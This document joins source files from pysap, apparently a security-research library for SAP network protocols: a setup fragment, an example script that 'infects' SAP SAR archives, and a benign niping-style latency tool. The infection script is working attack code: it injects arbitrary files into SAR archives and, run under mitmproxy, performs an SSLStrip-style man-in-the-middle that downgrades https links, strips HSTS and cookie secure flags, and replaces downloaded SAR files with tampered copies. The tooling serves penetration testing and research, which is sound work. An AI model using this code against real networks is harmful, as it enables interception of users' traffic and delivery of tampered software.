      extras_require={"docs": open('requirements-docs.txt').read().splitlines(),
                      "examples": open('requirements-optional.txt').read().splitlines()},
      )



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import re
import logging
from os import unlink
from os.path import exists
from tempfile import NamedTemporaryFile
# External imports
from optparse import OptionParser, OptionGroup
# Custom imports
import pysap
from pysap.SAPCAR import SAPCARArchive


def infect_sar_file(sar_filename, inject_files):
    """ Receives a SAR file and infects it by adding new files

    :type sar_filename: string
    :param sar_filename: name of the SAR file to infect

    :type inject_files: list of strings
    :param inject_files: list of files to inject into the SAR file
    """

    sar = SAPCARArchive(sar_filename, "r+")

    # Add each of the files specified as inject files
    for filename, archive_filename in inject_files:
        sar.add_file(filename, archive_filename=archive_filename)

    # Writes the modified file
    sar.write()


# Command line options parser
def parse_options(args=None, req_filename=True):

    description = "This example script can be used to infect a given SAR v2.00 or v2.01 file by means of adding new " \
                  "files to it. Each file to infect is specified by a pair: filename (original filename) and archive "\
                  "filename (the name we want inside the archive). The script can also be used to dynamically infect "\
                  "SAR files being downloaded using mitmproxy. In that case, the scripts takes the files to inject as "\
                  "parameters, performs an SSLStrip-like MitM and when identifies a SAR file that is going to be " \
                  "offered as a download it infects it."

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] "
    if req_filename:
        usage += "-f <sar_filename> "
    usage += "[<filename> <archive filename>]"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target options")
    target.add_option("-f", "--sar-filename", dest="sar_filename", help="Filename of the SAR file to infect")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true",
                    default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, args) = parser.parse_args(args)

    if not req_filename:
        args.pop(0)
    elif req_filename and not options.sar_filename:
        parser.error("Must provide a file to infect!")

    if len(args) < 2 or len(args) % 2 != 0:
        parser.error("Invalid number or arguments!")

    inject_files = []
    while args:
        inject_files.append((args.pop(0), args.pop(0)))

    return options, inject_files


# Main function for when called from command-line
def main():
    options, inject_files = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    if not exists(options.sar_filename):
        print("[-] SAR file '%s' doesn't exist!" % options.sar_filename)
        return

    print("[*] Infecting SAR file '%s' with the following files:" % options.sar_filename)
    for (filename, archive_filename) in inject_files:
        if not exists(filename):
            print("[-] File to inject '%s' doesn't exist" % filename)
            return
        print("[*]\t%s\tas\t%s" % (filename, archive_filename))

    infect_sar_file(options.sar_filename, inject_files)


# Mitmproxy start event function
def start(context, argv):
    # set of SSL/TLS capable hosts
    context.secure_hosts = set()

    options, context.inject_files = parse_options(argv, req_filename=False)

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    for (filename, archive_filename) in context.inject_files:
        if not exists(filename):
            raise ValueError("File to inject '%s' doesn't exist" % filename)


# Mitmproxy request event function
def request(context, flow):
    flow.request.headers.pop('If-Modified-Since', None)
    flow.request.headers.pop('Cache-Control', None)

    # Proxy connections to SSL-enabled hosts
    if flow.request.pretty_host in context.secure_hosts:
        flow.request.scheme = 'https'
        flow.request.port = 443


# Mitmproxy response event function
def response(context, flow):
    from netlib.http import decoded

    with decoded(flow.response):
        # Remove HSTS headers
        flow.request.headers.pop('Strict-Transport-Security', None)
        flow.request.headers.pop('Public-Key-Pins', None)

        # Check if the file is a SAR file attachment
        if "content-disposition" in flow.response.headers:
            content_disposition = flow.response.headers.get("content-disposition").lower()
            if content_disposition.startswith("attachment") and content_disposition.endswith(".sar"):
                context.log("SAR file attachment found (%s bytes)" % flow.response.headers["content-length"])
                fil = NamedTemporaryFile(delete=False)
                fil.write(flow.response.content)
                fil.close()
                context.log("SAR file temporally stored as '%s'" % fil.name)

                infect_sar_file(fil.name, context.inject_files)
                context.log("SAR file infected !")

                with open(fil.name, "r") as new_fil:
                    content = new_fil.read()

                flow.response.content = content
                flow.response.headers["content-length"] = str(len(content))
                context.log("Returning infected SAR file (new size %s bytes)" % flow.response.headers["content-length"])

                unlink(fil.name)
                context.log("Removed temporally file '%s'" % fil.name)

        else:
            # Strip links in response body
            flow.response.content = flow.response.content.replace('https://', 'http://')

        # Strip links in 'Location' header
        if flow.response.headers.get('Location', '').startswith('https://'):
            location = flow.response.headers['Location']
            from six.moves import urllib
            hostname = urllib.parse.urlparse(location).hostname
            if hostname:
                context.secure_hosts.add(hostname)
            flow.response.headers['Location'] = location.replace('https://', 'http://', 1)

        # Strip secure flag from 'Set-Cookie' headers
        cookies = flow.response.headers.get_all('Set-Cookie')
        cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
        flow.response.headers.set_all('Set-Cookie', cookies)


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from datetime import datetime
from optparse import OptionParser, OptionGroup
from socket import socket, SHUT_RDWR, error as SocketError
# External imports
from scapy.packet import Raw
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPNI import SAPNIStreamSocket
from pysap.SAPRouter import SAPRoutedStreamSocket


# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = "This script is an example implementation of SAP's niping utility."

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] [mode] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    mode = OptionGroup(parser, "Running mode")
    mode.add_option("-s", "--start-server", dest="server", action="store_true",
                    help="Start server")
    mode.add_option("-c", "--start-client", dest="client", action="store_true",
                    help="Start client")
    parser.add_option_group(mode)

    target = OptionGroup(parser, "Target")
    target.add_option("-H", "--host", dest="host", help="Host")
    target.add_option("-S", "--port", dest="port", type="int", default=3298,
                      help="Port [%default]")
    target.add_option("--route-string", dest="route_string",
                      help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False,
                    help="Verbose output [%default]")
    misc.add_option("-B", "--buffer-size", dest="buffer_size", type="int", default=1000,
                    help="Size of data-buffer [%default]")
    misc.add_option("-L", "--loops", dest="loops", type="int", default=10,
                    help="Number of loops [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.server and not options.client:
        parser.error("Running mode is required")

    if options.client and not (options.host or options.route_string):
        parser.error("Remote host is required for starting a client")

    return options


def client_mode(options):
    """"Implements the niping client running mode

    :param options: option set from the command line
    :type options: Values
    """

    times = []
    p = Raw("EYECATCHER" + "\x00" * (options.buffer_size - 10))

    try:
        # Establish the connection
        conn = SAPRoutedStreamSocket.get_nisocket(options.host,
                                                  options.port,
                                                  options.route_string)
        print("")
        print(datetime.today().ctime())
        print("connect to server o.k.")

        # Send the messages
        for i in range(options.loops):

            # Send the packet and grab the response
            start_time = datetime.now()
            r = conn.sr(p)
            end_time = datetime.now()

            # Check the response
            if str(r.payload) != str(p):
                print("[-] Response on message {} differs".format(i))

            # Calculate and record the elapsed time
            times.append(end_time - start_time)

        # Close the connection properly
        conn.send(Raw())
        conn.close()

    except SocketError:
        print("[*] Connection error")
    except KeyboardInterrupt:
        print("[*] Cancelled by the user")

    if times:
        print("")
        print(datetime.today().ctime())
        print("send and receive {} messages (len {})".format(len(times), options.buffer_size))

        # Calculate the stats
        times = [x.total_seconds() * 1000 for x in times]
        times_min = min(times)
        times_max = max(times)
        times_avg = float(sum(times)) / max(len(times), 1)
        times_tr = float(options.buffer_size * len(times)) / float(sum(times))

        times2 = [x for x in times if x not in [times_min, times_max]]
        times2_avg = float(sum(times2)) / max(len(times2), 1)
        times2_tr = float(options.buffer_size * len(times2)) / float(sum(times2))

        # Print the stats
        print("")
        print("------- times -----")
        print("avg  {:8.3f} ms".format(times_avg))
        print("max  {:8.3f} ms".format(times_max))
        print("min  {:8.3f} ms".format(times_min))
        print("tr   {:8.3f} kB/s".format(times_tr))

        print("excluding max and min:")
        print("av2  {:8.3f} ms".format(times2_avg))
        print("tr2  {:8.3f} kB/s".format(times2_tr))
        print("")


def server_mode(options):
    """"Implements the niping server running mode

    :param options: option set from the command line
    :type options: Values
    """

    if not options.host:
        options.host = "0.0.0.0"

    sock = socket()
    try:
        sock.bind((options.host, options.port))
        sock.listen(0)
        print("")
        print(datetime.today().ctime())
        print("ready for connect from client ...")

        while True:
            sc, sockname = sock.accept()
            client = SAPNIStreamSocket(sc)

            print("")
            print(datetime.today().ctime())
            print("connect from host '{}', client hdl {} o.k.".format(sockname[0], client.fileno()))

            try:
                while True:
                    r = client.recv()
                    client.send(r.payload)

            except SocketError:
                pass

            finally:
                print("")
                print(datetime.today().ctime())
                print("client hdl {} disconnected ...".format(client.fileno()))

    except SocketError:
        print("[*] Connection error")
    except KeyboardInterrupt:
        print("[*] Cancelled by the user")

    finally:
        sock.shutdown(SHUT_RDWR)
        sock.close()


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    if options.buffer_size < 10:
        print("[*] Using minimum buffer size of 10 bytes")
        options.buffer_size = 10

    # Client running mode
    if options.client:
        client_mode(options)
    # Server running mode
    elif options.server:
        server_mode(options)


if __name__ == "__main__":
    main()
